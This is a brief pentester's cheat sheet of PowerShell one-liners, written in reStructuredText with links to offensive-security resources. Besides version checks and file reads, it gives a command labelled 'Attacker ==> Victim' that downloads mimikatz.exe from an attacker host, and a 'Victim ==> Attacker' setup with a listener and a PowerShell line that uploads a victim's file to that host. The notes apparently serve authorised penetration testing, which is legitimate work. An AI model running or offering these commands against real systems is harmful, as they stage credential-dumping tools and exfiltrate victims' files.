##########
PowerShell
##########

| https://book.hacktricks.xyz/windows-hardening/basic-powershell-for-pentesters
| https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Powershell%20-%20Cheatsheet.md
| https://github.com/AlessandroZ/LaZagne
| https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md

|

*******
Version
*******

.. code-block:: powershell

    # Get PS version
    Get-Host | Select-Object Version

    # Alternatively, type $PSVersionTable and hit the Enter key
    $PSVersionTable

|

*****
Files
*****

Read
****

.. code-block:: powershell

    powershell Get-Content "../bla.php"

|

Download
********

Attacker ==> Victim

.. code-block:: powershell

    powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://4.3.2.1/Win32/mimikatz.exe', 'mimikatz.exe')"

|

Upload
******

Victim ==> Attacker

.. code-block:: bash

    # Attacker side
    cd $(mktemp -d) && git clone https://gitlab.com/charles.gargasson/PostDL .
    sudo python3 postdl.py --ip 0.0.0.0 --port 80

.. code-block:: powershell

    # Upload from Victim
    powershell -c "(New-Object System.Net.WebClient).UploadFile('http://4.3.2.1/','C:\Users\BOB\Pictures\xyz.jpg')"